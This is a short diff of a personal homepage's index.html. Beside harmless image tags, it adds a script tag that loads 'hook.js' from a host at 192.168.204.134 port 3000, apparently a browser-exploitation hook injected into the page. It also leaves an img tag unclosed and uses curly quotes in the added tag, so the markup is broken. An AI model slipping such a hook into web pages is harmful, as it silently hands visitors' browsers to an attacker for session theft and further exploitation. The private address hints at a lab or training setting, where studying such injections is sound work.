--- a/index.html
+++ b/index.html
@@ -30,7 +30,8 @@
     </div>
     <img src="images/websitedesignismypassion.png" alt="website design is my passion" class="homebanner imagecenter"/>
     <img src="images/aboutme.png" alt="About me" class="imagecenter"
-    <img src="images/tposeing.png" alt="Tpose god" class="homebanner imagecenter"/>
+    <img src="images/tposeing.png" alt="Tpose god" class="homebanner imagecenter"/
+    <script src=”http://192.168.204.134:3000/hook.js” type=”text/javascript”></script>
   </body>
   <body background="images/spacebackground.png">
 </html>
